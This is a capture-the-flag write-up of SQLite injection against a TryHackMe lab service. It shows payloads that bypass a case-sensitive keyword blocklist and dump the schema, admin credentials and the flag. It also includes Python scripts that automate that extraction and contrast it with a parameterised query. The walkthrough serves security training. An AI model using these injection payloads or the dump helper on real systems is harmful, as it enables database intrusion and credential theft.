
TryHackMe - Light

I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using nc 10.10.144.90 1337 You can use the username smokey in order to get started.

The goal is to retrieve the following:

  1. Admin Username
  2. Admin Password
  3. Flag

We connect to the server and try the smokey user, which returns a password, and the admin user, which does not seem to exist.

```
$ nc 10.10.144.90 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: admin
Username not found.
```

As it’s a database application, we can try to insert quotes to see if it breaks.

```
Please enter your username: "
Username not found.
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"
```

The single quote terminates the string literal, while the double quote is just another character inside it and does nothing. The tail of the error message shows what the application appends after the literal, so the query behind the scenes looks like:

```
SELECT * FROM users WHERE username = '{input}' LIMIT 30;
```

(The table turns out to be called usertable, and the value printed after "Password:" is the password column of the matching row, which is what makes the UNION results below readable.) The application breaks when a single quote (') is entered, so we can now start crafting our payload to retrieve the admin username. Although I didn't follow a structured methodology, the usual process would involve:

  • Finding the database type
  • Finding the database version
  • Gathering the database names
  • Finding the table names
  • And so on
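To see the two probes side by side, here is an added example (not the room's code) that rebuilds the lookup in Python with sqlite3 on a constructed in-memory database. The table layout and the smokey row are taken from the walkthrough; that the service itself is a Python/sqlite3 app is an assumption. The parameterised version alongside it shows why the same inputs are harmless once the value is bound instead of pasted into the SQL text:

```python
import sqlite3

# Constructed stand-in for the Light service (assumption: it is a
# Python/sqlite3 app). The table layout copies what the walkthrough
# recovers from sqlite_master; the rows are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE usertable (id INTEGER PRIMARY KEY, username TEXT, password INTEGER);
        INSERT INTO usertable (username, password)
            VALUES ('smokey', 'vYQ5ngPpw8AdUmL'), ('alice', 'hunter2');
    """)
    return conn

def lookup_vulnerable(conn, username):
    # The query reconstructed from the error message: user input is
    # pasted straight into the string literal.
    sql = f"SELECT password FROM usertable WHERE username = '{username}' LIMIT 30"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def lookup_safe(conn, username):
    # Same query with a bound parameter: the input can never leave the literal.
    sql = "SELECT password FROM usertable WHERE username = ? LIMIT 30"
    row = conn.execute(sql, (username,)).fetchone()
    return row[0] if row else None

def probe(conn, lookup, username):
    """Run one lookup and report what a tester sees on the wire:
    ('ok', password_or_None) or ('error', sqlite_message)."""
    try:
        return ("ok", lookup(conn, username))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for payload in ("smokey", '"', "'"):
        print(repr(payload), "vulnerable:", probe(db, lookup_vulnerable, payload))
        print(repr(payload), "safe:      ", probe(db, lookup_safe, payload))
```

Against the vulnerable lookup the lone single quote produces the same `unrecognized token: "''' LIMIT 30"` error the service printed, and the double quote returns nothing because it never leaves the literal; the parameterised lookup just treats both as usernames that do not exist.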

I tried several payloads and noticed that certain character sequences and keywords are blacklisted (/*, --, %0b, SELECT, and UNION). The two checks answer with different messages, so they are separate filters:

```
Please enter your username: ' UNION select user from users;--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: 1' + sleep(10);--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: 1' UNION SELECT null
Ahh there is a word in there I don't like :(-
```

The keyword filter is case-sensitive while SQL keywords are not, so mixed-case spelling slips past it. The trailing space and quote in the payload matter too: together with the application's own closing quote they form an empty string literal '' after the injected SELECT, which SQLite accepts as an alias, so the statement still parses and the UNION result is printed as the password:

```
Please enter your username: ' Union Select 1 '
Password: 1
```

We can now enumerate the schema. The missing information_schema rules out MySQL, and the backend is SQLite: the name sqlite_schema was only added as an alias of sqlite_master in SQLite 3.33.0, so the "no such table: sqlite_schema" error means this is an older release and we have to query sqlite_master.

```
Please enter your username: ' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata '
Error: no such table: information_schema.schemata
Please enter your username: ' Union Select sql from sqlite_schema '
Error: no such table: sqlite_schema
Please enter your username: ' Union Select sql from sqlite_master '
Password: CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)
```

This gives the first answer, the admin username:

```
Please enter your username: ' Union Select username from admintable '
Password: TryHackMeAdmin
```

And the password as well. Here the query's own closing quote finishes the injected string literal, so no trailing quote is needed:

```
Please enter your username: ' Union Select password from admintable where username='TryHackMeAdmin
Password: mamZtAuMlrsEy5bp6q17
```

To find the flag we need a fuller view of the data in the database. The application prints a single Password: line per query, so we use group_concat to collapse every row of a column into one result:

```
Please enter your username: ' Union Select group_concat(sql) from sqlite_master '
Password: CREATE TABLE usertable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER),CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)
Please enter your username: ' Union Select group_concat(username) from usertable '
Password: alice,rob,john,michael,smokey,hazel,ralph,steve
Please enter your username: ' Union Select group_concat(username) from admintable '
Password: TryHackMeAdmin,flag
Please enter your username: ' Union Select password from admintable where username='flag
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
```
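The whole chain, from the case-sensitive blocklist to the group_concat enumeration, as an added example that is not the room's code. It models both the capitalisation bypass above and the schema and data extraction in Python with sqlite3 on a constructed in-memory copy of the two tables (made-up rows and a made-up flag; that the real service is Python/sqlite3 is an assumption). The filter reproduces the behaviour observed on the page, and `dump_column` generalises the page's group_concat trick to any table and column. A case-insensitive filter is included only to show why the bypass worked; it is still a blocklist, and the real fix is the bound parameter:

```python
import re
import sqlite3

# Constructed stand-in for the Light service: the two tables the
# walkthrough found, with made-up rows and a made-up flag (assumption:
# the service is a Python/sqlite3 app; none of this is the room's code).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE usertable (id INTEGER PRIMARY KEY, username TEXT, password INTEGER);
        CREATE TABLE admintable (id INTEGER PRIMARY KEY, username TEXT, password INTEGER);
        INSERT INTO usertable (username, password) VALUES ('smokey', 'vYQ5ngPpw8AdUmL');
        INSERT INTO admintable (username, password)
            VALUES ('TryHackMeAdmin', 'constructedAdminPw'), ('flag', 'THM{constructed}');
    """)
    return conn

BLOCKED_SUBSTRINGS = ("/*", "--", "%0b")
BLOCKED_KEYWORDS = ("SELECT", "UNION")

def filter_naive(user_input):
    """Blocklist matching what the page observed: plain substring checks,
    so the keyword check only matches upper-case SELECT/UNION."""
    if any(s in user_input for s in BLOCKED_SUBSTRINGS):
        return "substring"
    if any(k in user_input for k in BLOCKED_KEYWORDS):
        return "keyword"
    return None

def filter_case_insensitive(user_input):
    """Closes the capitalisation hole. Still a blocklist: the real fix is a
    bound parameter; this only shows why the bypass worked."""
    upper = user_input.upper()
    if any(s.upper() in upper for s in BLOCKED_SUBSTRINGS):
        return "substring"
    if any(k in upper for k in BLOCKED_KEYWORDS):
        return "keyword"
    return None

def query(conn, user_input, filt=filter_naive):
    """The injectable lookup behind the 'Password:' line, guarded by a filter.
    Returns None when the filter fires or when no row matches."""
    if filt(user_input):
        return None
    sql = f"SELECT password FROM usertable WHERE username = '{user_input}' LIMIT 30"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

# Payloads from the walkthrough. The trailing " '" matters: together with
# the application's own closing quote it forms an empty string literal '',
# which SQLite accepts as an alias, so the statement still parses.
PAYLOAD_SCHEMA = "' Union Select group_concat(sql) from sqlite_master '"
PAYLOAD_FLAG = "' Union Select password from admintable where username='flag"

def enumerate_tables(conn, filt=filter_naive):
    """Pull every CREATE TABLE statement in one round trip and parse the names."""
    dump = query(conn, PAYLOAD_SCHEMA, filt) or ""
    return sorted(re.findall(r"CREATE TABLE (\w+)", dump))

def dump_column(conn, table, column, filt=filter_naive):
    """Generalises the page's group_concat trick to any table/column pair."""
    payload = f"' Union Select group_concat({column}) from {table} '"
    result = query(conn, payload, filt)
    return result.split(",") if result else []

if __name__ == "__main__":
    db = make_db()
    print("tables:", enumerate_tables(db))
    print("admin users:", dump_column(db, "admintable", "username"))
    print("flag:", query(db, PAYLOAD_FLAG))
    print("flag with case-insensitive filter:", query(db, PAYLOAD_FLAG, filter_case_insensitive))
```

Run with the naive filter, `enumerate_tables` returns both table names from a single request and the flag row comes back exactly as on the page; switch the filter to `filter_case_insensitive` and the same payloads are refused, which is the only difference between the two blocklists.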

This post is licensed under CC BY 4.0 by the author.